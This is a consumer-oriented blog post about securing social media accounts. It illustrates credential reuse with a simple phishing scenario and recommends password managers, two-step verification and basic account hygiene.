Social media is heavily connected to your identity in modern society and there is significant overlap between your public accounts (Facebook, Twitter, etc.) and personal accounts like your bank and email. Don’t take my word for it though, think about examples of how social media is connected to other sensitive accounts in your own life. Almost everybody has at least a few accounts linked with their social profiles. Many people use the same username, password, or email for both their bank account and their social pages! Even if you don’t use the same password but you use the same username, it’s twice as easy to get into your account because a hacker only has to guess your password instead of guessing your username AND password. To give you a better perspective, many computers nowadays can guess billions of passwords a second. Do you still feel safe with your six character password? Consider the common scenario:

A malicious hacker browses through social media pages with the intent of breaking into someone’s personal accounts and they come across your Facebook/Instagram/Twitter page. Your username is cooldude24 and they decide to send a fake email to cooldude24@gmail.com (or Yahoo, iCloud, etc.) because most people reuse their usernames for multiple accounts. The email looks like it’s from Google themselves asking you to enter your password to verify your login information so your account doesn’t get deactivated. You reply because you’re afraid of getting shut down and it looks legit. Now the hacker has the username and password to your email which means they can login. Just about every major bank (or ANY online account) has a password recovery option that sends an email to you so you can reset your password. Because they have access to your email they reset your bank password, login to your account, and lock you out of it. Do you see how one piece of information leads to another?

I’m a cybersecurity researcher, so speaking from experience in analyzing security breaches trust me when I say that this is a mild example. If someone gets access to your social security number you can be in far worse of a pickle than someone getting a few bucks from your bank account. Enough about why it’s important, let’s move on to simple things you can do.

Utilizing a Password Manager

Remembering tons of crazy long passwords and usernames for all the different sites we visit is unreasonable even for the greatest of memories. The great thing is we don’t have to anymore! A password manager is probably the top safety practice that you can employ to protect your accounts. A password manager will generate, store, and retrieve passwords for you so you don’t have to. The password manager will also encrypt your data so it will be nearly impossible for a hacker to retrieve any of your information. In the scenario above, a hacker would not be able to login to your email or bank account if you used complex usernames and passwords generated by the password manager.

There are lots of free choices out there that will automatically generate secure passwords for you and store them for when you want to login to a site. Many password managers have the ability to login to sites for you so you don’t have to lookup the password every time. As an added bonus they can keep track of your random usernames, pins, security questions, credit cards, and much more so you don’t have to remember those either (which is great for me because I forget literally everything). I know what many of you are thinking, what if someone guesses the password to your password manager?

That leads us to our next topic: two-step verification.

Two-Step Verification

I’m going to explain two-step verification with a simple real-life example. When you go to the DMV and finally get to the counter after 2 years, they ask you for two forms of identification. Why you say? One reason is verifying you are who you really say you are. If someone picks up your lost id (or steals it), they can’t make any decisions on your behalf by impersonating you. The second form of identification helps prevents fraud. The internet world uses the same concept. When you turn on two-step verification (also known as two-factor authentication) the website requires two forms of ID, namely your username/password combination and a code that is sent to your phone over text.

Going back to the first example in this post, if someone happens to get your username and password while two-step verification is active, they can’t login to your account because they don’t ALSO have the code that was sent to your phone. In layman’s terms, some hacker on the other side of the world can’t get into your account, because they don’t have physical access to your phone. All major accounts including password managers, email, banks, insurance, medical, and social media sites support two-step verification so you should turn it on! Click here to see how to set up two-step verification on all your social accounts. Most of the embarrassing celebrity account hacks could have been avoided with two-step verification, just saying…

Here are some other basic tips for securing your social media:

  • Change your passwords regularly, with a password manager this is trivial. Have the password manager generate a new password for you every 3 months or so. This will make your account significantly more secure and will only take 45 seconds of your life.
  • Sign out of accounts when you are finished using a shared computer. Many social media accounts are compromised because someone used your account while you were still logged in.
  • If you are not using the account anymore, shut it down. This rule applies to many areas of life. If you don’t need it, don’t keep it.
  • If you can, create a unique email just for your social media that’s not attached to any of your other accounts. Having a dedicated social media email prevents any overlap between your social accounts and your private accounts. As we saw earlier, using the same email for social media and your bank can have disastrous consequences.
  • Go private. Unless you are a business, blog, or make a living from a public social page, there is no reason for your personal page to be public to the internet. Twitter, Instagram, Facebook, etc. give you the option to make your page private from the general public until you have accepted a friend request of some sort.

Conclusion

Hopefully these few tips help in your internet endeavors. It might seem irritating to get a text message every time you log in to your email or bank, but I can guarantee you it’s a lot less irritating than dealing with identity theft or fraud